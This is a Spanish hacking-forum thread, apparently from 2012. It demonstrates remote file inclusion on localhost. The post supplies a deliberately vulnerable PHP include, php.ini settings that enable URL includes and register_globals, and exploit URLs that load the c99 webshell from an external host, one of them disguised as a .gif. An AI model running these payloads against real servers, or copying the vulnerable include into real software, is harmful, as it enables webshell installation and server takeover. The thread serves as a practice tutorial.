Bienvenido(a) a la comunidad, Visitante. Por favor, Ingresa tu usuario o Regístrate Gratis!.
Mayo 22, 2013, 11:59:25

Avisos:
Registrarse  
Revista digital Dhackers! Bajala Gratis!
Páginas: [1]   Ir Abajo
Imprimir
Tema: [Práctica] RFI por localhost  (Leído 279 veces) Valoracion media: 0
0 Usuarios y 1 Visitante están viendo este tema.
wirelesswifi
Miembro
*****

Gracias Recibidas: 1
Desconectado Desconectado

Mensajes: 4


« : Julio 05, 2012, 11:05:32 »




Creamos un archivo llamado rfi.php con este codigo:

Código:
<?php
$archivo 
$_GET['secc'];
include(
$archivo);
?>

La variable vulnerable es $_GET['secc']

Para probar en localhost hacemos esto:

Hay que tener en ON estas funciones en el archivo php.ini:

Código:
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = On

; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
allow_url_include = On

; Whether or not to register the EGPCS variables as global variables. You may
; want to turn this off if you don't want to clutter your scripts' global scope
; with user data. This makes most sense when coupled with track_vars - in which
; case you can access all of the GPC variables through the $HTTP_*_VARS[],
; variables.
;
; You should do your best to write your scripts so that they do not require
; register_globals to be on; Using form variables as globals can easily lead
; to possible security problems, if the code is not very well thought of.
register_globals = On

Reiniciar la computadora para que los cambios surjan efecto.

Podemos vulnerarlo asi:


Registrarse  
http://localhost/rfi.php?secc=http://www.1earn.net/LAB/code/
webshell/c99.txt?

Tambien con una imagen:


Registrarse  
http://localhost/rfi.php?secc=http://www.1earn.net/LAB/code/webshell/c99.gif?


Esto seria lo basico de un RFI, hoy en dia se encuentran muy pocas este tipo de vulnerabilidades por ultimas versiones recientes en los servidores.

Fuente:
Registrarse  
http://blogsinformatica.serveblog.net:8080/articulo.php?id=464646621


blogsinformatica.serveblog.net:8080/4lC0nR2/
« Última modificación: Julio 05, 2012, 11:07:33 por wirelesswifi » En línea

arthusu
Dhackers!
Colaborador Experto
*****

Gracias Recibidas: 55
Desconectado Desconectado

Sexo: Masculino
Mensajes: 2,274

"Yo sólo sé que no sé nada." - Sócrates


« RESPONDER #1 : Julio 06, 2012, 02:15:33 »



Excelente articulo gracias por traerlo man +1 punto saludos
En línea


Registrarse  
Páginas: [1]   Ir Arriba
Imprimir
Ir a:  



Ingresar con nombre de usuario, contraseña y duración de la sesión
Copyright DH © 2007 - 2013 | Dhackers.com | Powered by SMF 1.1.18 | SMF © 2006-2008, Simple Machines LLC | XHTML 1.0 válido!
Página creada en 0.407 segundos con 33 consultas.

Nuestros Afiliados:
| Nakp | Blog |_ocutus |